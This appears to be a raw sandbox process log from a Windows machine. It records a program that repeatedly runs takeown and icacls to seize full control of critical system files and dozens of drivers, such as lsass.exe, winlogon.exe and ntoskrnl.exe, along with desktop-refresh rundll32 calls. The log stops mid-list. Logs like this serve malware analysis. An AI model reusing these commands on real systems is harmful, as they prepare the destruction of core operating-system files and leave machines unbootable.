RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef69e9758,0x7fef69e9768,0x7fef69e9778

C:\Program Files\Microsoft Games\solitaire\solitaire.exe

"C:\Program Files\Microsoft Games\solitaire\solitaire.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\smss.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\csrss.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\smss.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\csrss.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\wininit.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\wininit.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\lsass.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\services.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\winlogon.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\services.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\lsass.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\winlogon.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\winload.efi

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\winload.efi /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\winload.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\ntoskrnl.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\winload.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\csrss.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\svchost.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\smss.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\wininit.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\LogonUI.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\svchost.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\lsass.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\services.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\winlogon.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\winload.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\winload.efi

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\ntoskrnl.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\SysWOW64\svchost.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\1394bus.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\1394ohci.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\acpi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\acpipmi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\adp94xx.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\adpahci.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\adpu320.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\afd.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\agilevpn.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\AGP440.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\aliide.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdk8.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdppm.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdsata.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdsbs.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\amdxata.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\appid.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\arc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\arcsas.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\asyncmac.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\atapi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ataport.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\b57nd60a.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\battc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-4278375462113546083781927611-1130566262-1248772236-178406448519936304171606189304"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1087685691526092037-126433495413464102341841290500-1439374373-77746300-235685080"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\beep.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\blbdrive.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrFiltLo.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bowser.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "446847887-19269908641075281288188406400883293862257609704112777078701496669314"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrFiltUp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bridge.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrSerId.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrSerWdm.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\BrUsbSer.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bthmodem.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\bxvbda.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cdrom.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Classpnp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cdfs.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\circlass.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\CmBatt.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cmdide.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\compbatt.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cng.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-702718861673787055-1174548551-1934394000-689393877-1515398991-304595658-313715833"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\CompositeBus.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

